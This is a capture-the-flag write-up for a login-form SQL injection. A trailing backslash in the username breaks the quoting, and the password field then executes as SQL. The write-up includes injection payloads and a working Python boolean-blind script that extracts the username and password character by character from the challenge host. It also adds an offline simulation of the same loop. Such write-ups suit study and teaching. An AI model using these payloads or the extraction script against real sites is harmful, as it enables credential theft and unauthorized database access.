select * from users where username='$_POST["username"]' and password='$_POST["password"]';
First I tried a few payloads that close the string with '
okkk! ' is filtered
So let's work from the SQL statement itself
I remembered addslashes() from earlier study, which escapes with \. If the username ends in \, that backslash escapes the closing ' of the username literal, so the string runs on through " and password=" up to the opening quote of the password value, and whatever is in the password field is executed as SQL. Let's see what that does:
select * from users where username='123\' and password='union select 1,2,3#';
okkkk! union and friends seem to be filtered too
Try or instead; the statement is then
select * from users where username='123\' and password='or 1#';
The page returns BJD needs to be stronger
So that looks like a successful injection: a true condition gives "stronger", a false one does not, so this is a fairly simple boolean-based blind injection challenge
Go straight to the script
import requests
import time

url = "http://28c73fa1-00c6-4fe9-a54a-08730ca346ad.node3.buuoj.cn/"

def Get_Flag(url):
    Flag = ""
    for i in range(1, 30):
        # binary search the ASCII code of character i in the range 32..127
        Max = 128
        Min = 32
        Mid = (Max + Min) // 2
        while Min < Max:
            time.sleep(0.5)
            # payload = "or ascii(substr(database(),%d,1))>%d#" % (i, Mid)
            payload = 'or ascii(substr((username),{},1))>{}#'.format(i, Mid)
            # payload = 'or ascii(substr((password),{},1))>{}#'.format(i, Mid)
            # the trailing \ escapes the closing quote of the username literal,
            # so the password field is executed as SQL
            data = {"username": "123\\", "password": payload}
            r = requests.post(url=url, data=data)
            if "stronger" in r.text:   # condition true: code > Mid
                Min = Mid + 1
            else:                      # condition false: code <= Mid
                Max = Mid
            Mid = (Max + Min) // 2
        # bottomed out (past the end of the string, ascii('') is 0) or topped out
        if Min == 32 or Max == 128:
            print('break')
            break
        Flag = Flag + chr(Mid)
        print(Flag)

Get_Flag(url)
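The following is an added example, not the writeup's script: an offline model of the challenge that shows why a trailing backslash in the username puts the password field outside the string literal, and then runs the same binary-search extraction loop against a local oracle instead of the server. The sample row (admin / s3cret), the "Login failed" text, the table name and the regex that recognises the payload are constructed assumptions; only the response text "BJD needs to be stronger" comes from the writeup.

```python
import re

# Added example, not the writeup's script: an offline model of the challenge so
# the backslash trick and the binary-search loop can be checked without the
# server. The table contents, the failure text and the payload regex are
# constructed assumptions; only 'BJD needs to be stronger' is from the writeup.
TABLE = [{"username": "admin", "password": "s3cret"}]  # constructed sample row


def build_query(username, password):
    """Build the query the way the vulnerable page does: raw interpolation."""
    return ("select * from users where username='%s' and password='%s';"
            % (username, password))


def read_literal(query, start):
    """Scan a MySQL single-quoted literal starting just after its opening quote,
    treating backslash as an escape (doubled quotes are not modelled).
    Returns (decoded literal, index of the first char after the closing quote)."""
    out = []
    i = start
    while i < len(query):
        c = query[i]
        if c == "\\" and i + 1 < len(query):
            out.append(query[i + 1])  # escaped character, including an escaped '
            i += 2
            continue
        if c == "'":
            return "".join(out), i + 1
        out.append(c)
        i += 1
    raise ValueError("unterminated string literal")


def injected_tail(username, password):
    """Return the SQL that ends up OUTSIDE the username literal. With a trailing
    backslash in username, the literal swallows its own closing quote and
    " and password=", so the password field is parsed as SQL."""
    q = build_query(username, password)
    start = q.index("username='") + len("username='")
    _, after = read_literal(q, start)
    return q[after:]


# Only the payload shape used in the writeup is understood by the model.
PAYLOAD_RE = re.compile(r"^or ascii\(substr\(\((\w+)\),(\d+),1\)\)>(\d+)#")


def fake_server(username, password):
    """Model of the challenge page: 'BJD needs to be stronger' when the WHERE
    clause is true for some row, a constructed failure text otherwise. The
    username literal never matches a row, so the result is just the OR branch."""
    m = PAYLOAD_RE.match(injected_tail(username, password))
    if not m:
        return "Login failed"  # constructed negative response
    col, pos, n = m.group(1), int(m.group(2)), int(m.group(3))
    for row in TABLE:
        ch = row[col][pos - 1:pos]         # substr() past the end gives ''
        if (ord(ch) if ch else 0) > n:     # MySQL: ascii('') = 0
            return "BJD needs to be stronger"
    return "Login failed"


def extract(column, oracle, max_len=30):
    """Boolean-based blind extraction, the same search as the writeup's script:
    binary search each character over ASCII 32..127 using
    oracle(username, password) -> page text. Stops when the search bottoms out
    at 32 (ascii('') = 0 past the end of the string) or tops out at 128."""
    result = ""
    for i in range(1, max_len + 1):
        lo, hi = 32, 128
        while lo < hi:
            mid = (lo + hi) // 2
            payload = "or ascii(substr(({}),{},1))>{}#".format(column, i, mid)
            if "stronger" in oracle("123\\", payload):
                lo = mid + 1    # character code is > mid
            else:
                hi = mid        # character code is <= mid
        if lo == 32 or lo == 128:
            break               # caveat: a real space (32) also ends the search
        result += chr(lo)
    return result


if __name__ == "__main__":
    print(injected_tail("123\\", "or 1#"))       # or 1#';
    print(extract("username", fake_server))      # admin
    print(extract("password", fake_server))      # s3cret
```

The sentinel on 32 is the same one the writeup's script uses, and it has the same limitation: a column value containing a space stops the extraction early, so for arbitrary data a length query (`length(username)`) is the safer stop condition.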